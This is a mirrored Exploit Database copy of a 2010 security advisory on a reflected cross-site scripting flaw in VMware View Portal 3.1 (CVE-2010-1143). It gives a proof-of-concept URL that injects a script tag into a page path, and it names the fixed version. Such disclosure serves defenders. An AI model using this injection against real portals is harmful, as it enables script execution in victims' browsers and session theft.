VMware View Portal 3.1 – Cross-Site Scripting

• Exploit Database
• 109 阅读

• 作者： Alexey Sintsov
  日期： 2010-05-14
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/12610/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56

  [DSECRG-09-058] Vmware View - XSS vulnerability   Source:http://www.dsecrg.com/pages/vul/show.php?id=158   Linked XSS in VMware Portal   Digital Security Research Group [DSecRG] Advisory DSECRG-09-058   Application: VMware View Portal Versions Affected: <= 3.1 Vendor URL: http://www.vmware.com Bugs: XSS Exploits: YES Reported: 07.09.2009 Vendor response: 21.09.2009 Date of Public Advisory: 05.05.2010 CVE: CVE-2010-1143 Author: Alexey Sintsov from Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)     Description ***********   Linked XSS in VMware Portal     Details *******   An attacker may inject JavaScript code into url.   Example: ********   https://[VMware_Portal_IP]/not_a_real_page<SCRIPT>alert(/XSS/.source)</SCRIPT>   Solution ******** Update VmWare View to version 3.1.3   References ********** http://dsecrg.com/pages/vul/show.php?id=149 http://lists.vmware.com/pipermail/security-announce/2010/000092.html     About *****   Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.     Contact: research [at] dsecrg [dot]com http://www.dsecrg.com